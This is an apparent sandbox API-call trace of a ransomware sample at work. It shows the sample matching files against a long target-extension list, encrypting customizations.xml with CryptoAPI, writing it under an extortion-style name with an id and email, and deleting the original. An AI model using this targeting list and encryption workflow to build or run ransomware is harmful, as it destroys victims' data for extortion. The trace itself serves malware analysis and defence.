	[0174.997] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml"
	[0174.997] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml") returned 99
	[0174.997] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.997] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.997] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0174.997] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.998] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0174.998] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.998] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.998] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0174.999] ReadFile (in: hFile=0x390, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x666, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x18a640*=0x666, lpOverlapped=0x0) returned 1
	[0175.004] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.004] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcae68) returned 1
	[0175.006] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.007] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0175.007] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.007] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0175.007] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.007] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb94b0) returned 1
	[0175.007] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.007] CryptEncrypt (in: hKey=0xfb94b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x666, dwBufLen=0x666 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x670) returned 1
	[0175.008] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.008] RtlMoveMemory (in: Destination=0xfde400, Source=0xfdc138, Length=0x666 | out: Destination=0xfde400) 
	[0175.008] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.008] CryptEncrypt (in: hKey=0xfb94b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfde400*, pdwDataLen=0x18a1ec*=0x666, dwBufLen=0x670 | out: pbData=0xfde400*, pdwDataLen=0x18a1ec*=0x670) returned 1
	[0175.009] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.009] CryptDestroyKey (hKey=0xfb94b0) returned 1
	[0175.009] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.009] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0175.009] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.009] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0175.010] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.010] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.012] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0175.019] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 141
	[0175.019] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.020] WriteFile (in: hFile=0x39c, lpBuffer=0xfde400*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfde400*, lpNumberOfBytesWritten=0x18a648*=0x670, lpOverlapped=0x0) returned 1
	[0175.023] CloseHandle (hObject=0x39c) returned 1
	[0175.024] CloseHandle (hObject=0x390) returned 1
	[0175.024] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml")) returned 1
	[0175.028] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml")) returned 0
	[0175.028] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb9c845, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xeb9c845, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xeb9c845, ftLastWriteTime.dwHighDateTime=0x1d112b1, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0175.029] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="..") returned 1
	[0175.029] lstrcmpW (lpString1="MasterDatastore.xml", lpString2=".") returned 1
	[0175.029] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\"
	[0175.029] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\", lpString2="MasterDatastore.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\MasterDatastore.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\MasterDatastore.xml"
	[0175.029] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\MasterDatastore.xml") returned 100
	[0175.029] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.029] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\MasterDatastore.xml", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml") returned 0x64
	[0175.030] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.030] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0175.030] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml"
	[0175.030] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml") returned 100
	[0175.030] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.030] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.031] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0175.031] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.031] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0175.031] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.031] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.031] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.032] ReadFile (in: hFile=0x390, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x18a640*=0x10f, lpOverlapped=0x0) returned 1
	[0175.035] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
